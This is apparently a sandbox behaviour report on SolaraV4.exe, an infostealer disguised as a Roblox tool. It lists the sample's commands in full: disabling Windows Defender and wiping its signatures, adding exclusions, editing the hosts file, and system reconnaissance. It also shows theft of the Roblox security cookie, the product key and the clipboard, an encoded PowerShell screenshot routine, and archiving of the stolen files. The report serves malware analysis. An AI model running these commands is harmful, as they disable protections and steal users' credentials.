Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Modifies the hosts file
Source: C:\Users\user\Desktop\SolaraV4.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Removes signatures from Windows Defender
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AH